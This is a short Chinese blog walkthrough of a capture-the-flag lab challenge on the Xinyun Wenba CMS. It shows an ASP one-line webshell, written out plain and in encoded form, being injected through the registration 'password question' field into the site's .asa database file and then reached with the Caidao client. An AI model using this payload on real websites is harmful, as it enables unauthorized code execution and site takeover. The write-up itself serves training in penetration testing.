欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

墨者靶场 中级:CMS系统漏洞分析溯源(第3题)

程序员文章站 2022-03-25 07:52:13
...

墨者靶场 中级:CMS系统漏洞分析溯源(第3题)

题目

墨者靶场 中级:CMS系统漏洞分析溯源(第3题)

背景介绍

某公司内部搭建了一个类似百度知道的互动知识问答分享平台–新云问吧CMS。
为了确保该网站的安全性,故请你检测该网站是否存在安全漏洞。

实训目标

了解并运用新云问吧CMS的通用漏洞–问吧采用自己的数据库,数据库文件为.asa格式,由于过滤不严,导致可以向数据库中插入一句话木马,从而拿到webshell。

解题方向

根据右图提示,在用户注册或修改用户资料的“密码问题”处测试。

解题步骤

启动靶机,访问链接。
墨者靶场 中级:CMS系统漏洞分析溯源(第3题)
按照题目提示,应该是在注册页面的“密码问题”那里插入一句话木马到数据库。
但是我们的一句话要进行编码才能用。

<%execute(request("a"))%>
┼攠數畣整爠煥敵瑳∨≡┩愾 

墨者靶场 中级:CMS系统漏洞分析溯源(第3题)
墨者靶场 中级:CMS系统漏洞分析溯源(第3题)
访问data/ask_newasp.asa,可以看到马已经插进数据库中了。
墨者靶场 中级:CMS系统漏洞分析溯源(第3题)
使用菜刀去连接,寻找key文件,得到key值。
墨者靶场 中级:CMS系统漏洞分析溯源(第3题)
墨者靶场 中级:CMS系统漏洞分析溯源(第3题)
提交key值,完工。
墨者靶场 中级:CMS系统漏洞分析溯源(第3题)

相关标签: 墨者靶场实战